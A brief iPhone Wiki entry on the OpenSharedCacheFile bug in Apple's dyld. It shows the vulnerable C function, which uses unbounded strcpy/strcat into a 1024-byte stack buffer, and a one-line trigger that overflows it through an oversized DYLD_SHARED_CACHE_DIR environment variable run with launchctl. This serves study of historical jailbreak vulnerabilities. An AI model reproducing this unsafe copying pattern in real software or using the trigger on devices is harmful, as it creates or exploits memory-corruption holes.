The iPhone Wiki is no longer updated. Visit this article on The Apple Wiki for current information. |
OpenSharedCacheFile
The OpenSharedCacheFile bug was found by i0n1c, what this bug is just a simple stack overflow
int openSharedCacheFile() { char path[1024]; strcpy(path, sSharedCacheDir); strcat(path, "/"); strcat(path, DYLD_SHARED_CACHE_BASE_NAME ARCH_NAME); return ::open(path, O_RDONLY); }
Triggering the vuln
To trigger it, run the following
DYLD_SHARED_CACHE_DIR = “A” * 2000 \ DYLD_SHARED_REGION = private /bin/launchctl
This will overflow the PC register making it a stack overflow.